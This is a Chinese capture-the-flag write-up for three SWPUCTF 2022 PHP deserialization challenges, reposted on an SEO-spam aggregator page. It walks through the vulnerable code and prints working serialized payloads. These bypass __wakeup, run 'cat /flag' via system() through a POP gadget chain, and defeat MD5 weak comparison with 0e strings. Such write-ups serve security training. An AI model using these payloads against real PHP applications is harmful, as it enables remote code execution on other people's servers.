当前位置：首页 > news >正文

网上做调查网站有哪些/厦门seo哪家强

news 文章来源：https://blog.csdn.net/2401_82985722/article/details/139631404 2025/3/9 23:04:21

网上做调查网站有哪些,厦门seo哪家强,做网站必须要文网文吗,wordpress的媒体库图片不显示[SWPUCTF 2022 新生赛]ez_ez_unserialize <?php class X {public $x __FILE__;function __construct($x){$this->x $x; }function __wakeup(){if ($this->x ! __FILE__) {$this->x __FILE__; }}function __destruct(){highlight_file($this->x);//flag is…

[SWPUCTF 2022 新生赛]ez_ez_unserialize

<?php
class X
{public $x = __FILE__;function __construct($x){$this->x = $x;  }function __wakeup(){if ($this->x !== __FILE__) {$this->x = __FILE__; }}function __destruct(){highlight_file($this->x);//flag is in fllllllag.php    flag在fllllllag.php文件里}
}
if (isset($_REQUEST['x'])) {        @unserialize($_REQUEST['x']);    //将x反序列化输出
} else {highlight_file(__FILE__);
}

因为flag在fllllllag.php文件里，所以要让fllllllag.php文件在x中，让x等于这个文件的序列化

对x进行序列化操作：

<?php
class X
{public $x ='fllllllag.php'; 	
}
$a=new X();
echo serialize($a);
?>//输出：O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

绕过__wakeup()函数，构造payload：得到flag

?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

__wakeup()函数漏洞原理：

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

[SWPUCTF 2022 新生赛]1z_unserialize

<?php//包含了一个名为lyh的类，该类有公共属性：url、lt和lly 
class lyh{            public $url = 'NSSCTF.com';public $lt;public $lly;function  __destruct()       //魔术方法__destruct()，在对象被销毁时调用{$a = $this->lt;          //尝试执行一个由$this->lt引用的函数，并将$this->lly作为参数传递给该函数。    $a($this->lly);           }}
unserialize($_POST['nss']);       //从POST请求中的nss参数读取序列化的数据，并进行反序列化操作
highlight_file(__FILE__);?>

赋值执行RCE：

直接将 $a 赋值为 system ，即将 $this->lt 赋值为 system ，那么 $this->lly 就可以赋值任意命令执行RCE。

将$this->lly赋值成ls /查看根目录，POST传参nss发现存在flag文件。

将$this->lly赋值成cat /flag读取flag。

<?php
class lyh
{public $url = 'NSSCTF.com';public $lt="system";public $lly="cat /flag";}
$a=new lyh();
echo serialize($a);
?>//输出：O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

php反序列化之pop链构造

做pop类题目要紧盯魔术方法。

需要找到普通类与魔术方法之间的联系，理出一种逻辑思路，通过这种逻辑思路来构造一条pop链，从而达到攻击的目的。

在构造调用链时，先找到调用链的头和尾。头一般都是能传参以及可以反序列化的地方，而尾部一般都是可以执行恶意代码的地方。

[SWPUCTF 2022 新生赛]ez_1zpop

代码审计

<?php
error_reporting(0);
class dxg                      //定义类dxg,其中只有一个方法fmm()
{function fmm()             {return "nonono";}
}class lt                        //定义类lt，包含公共属性impo、md51、md52
{public $impo='hi';public $md51='weclome';public $md52='to NSS';function __construct()       //__construct()类的构造函数，创建对象时触发 {$this->impo = new dxg;    //实例化了dxg类的对象并赋值给impo属性}function __wakeup()          //__wakeup()方法在反序列化对象时被调用{$this->impo = new dxg;    //也实例化了dxg类的对象，并返回fmm()方法的结果return $this->impo->fmm();}function __toString()        //__toString()把对象当成字符串调用时触发{if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm(); //返回impo属性的fmm()方法的结果}function __destruct()        //__destruct()方法在对象销毁前被调用，它会调用__toString()方法并输出结果。 {echo $this;}
}class fin                        //定义类fin，包含公共属性a和一个方法fmm()
{public $a;public $url = 'https://www.ctfer.vip';public $title;function fmm(){$b = $this->a;            //fmm()方法调用了属性a所指向的函数，并将属性title作为参数传递。$b($this->title);  }
}if (isset($_GET['NSS'])) {     //检查是否存在$_GET['NSS']参数，存在，对NSS进行反序列化$Data = unserialize($_GET['NSS']);
} else {highlight_file(__file__);
}

如果$this->impo 已设置，并且 $this->md51 = $this->md52 的 MD5 哈希值，同时 $this->md51 和 $this->md52 值不相等。就会调用 $this->impo->fmm() 方法。

function __toString(){if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm();}

0e绕过MD5弱比较：

令md51='s155964671a'; md52='s214587387a';

构造pop链：先把用到的类写出来，形成一个框架，然后补充类中的变量，再将用到的类进行实例化。

<?php
class lt
{#设置 $this->md51 = $this->md52 的 MD5 哈希值public $impo='hi';public $md51='s155964671a';public $md52='s214587387a';
}
class fin
{#赋值执行RCE:$a="system",$title="cat /flag"public $a='system';public $url = 'https://www.ctfer.vip';public $title='cat /flag';
}
#实例化类
$lt = new lt();
$fin = new fin();
#链子
$lt->impo=$fin;
echo serialize($lt);
?>//输出：O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}

得到输出后，记得绕过wakeup()，GTE传参NSS构造payload：得到flag

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}

网上做调查网站有哪些/厦门seo哪家强

[SWPUCTF 2022 新生赛]ez_ez_unserialize

__wakeup()函数漏洞原理：

[SWPUCTF 2022 新生赛]1z_unserialize

赋值执行RCE：

php反序列化之pop链构造

[SWPUCTF 2022 新生赛]ez_1zpop

0e绕过MD5弱比较：

相关文章：

[SWPUCTF 2022 新生赛]ez_1zpop(php反序列化之pop链构造)

2-1基于matlab的拉普拉斯金字塔图像融合算法

Android基础-进程间通信

【微信小程序】uni-app 配置网络请求

SpringCash

小红书的文案是怎么写的？有啥套路么！

开放平台接口安全验证

【AI原理解析】— GPT-4o模型

Qt中图表图形绘制类介绍

nginx rewrite地址重写

java+vue3+el-tree实现树形结构操作

Oracle创建索引的LOGGING | NOLOGGING区别

GoogleDeepMind联合发布医学领域大语言模型论文技术讲解

Spark安装、解压、配置环境变量、WordCount

DeepSeek-V2-Chat多卡推理(不考虑性能)

算法题day42（补5.28日卡：动态规划02）

分治与递归

Spring中IOC容器

php redis分布式锁

kotlin 中的布尔

有哪些ai聊天推荐？简单分享三款

Python第二语言（十、Python面向对象（上））

SolidWorks 2016 SP5安装教程

为什么高考志愿只选计算机专业？

GPT大模型微调-提高垂直领域回答质量

全网首发-Docker被封后的代理设置教程

代码随想录算法训练营第五十七天|1143.最长公共子序列、1035.不相交的线、53. 最大子序和、392.判断子序列

RocketMQ事务性消息

mysql (事物)

kotlin 中的字符串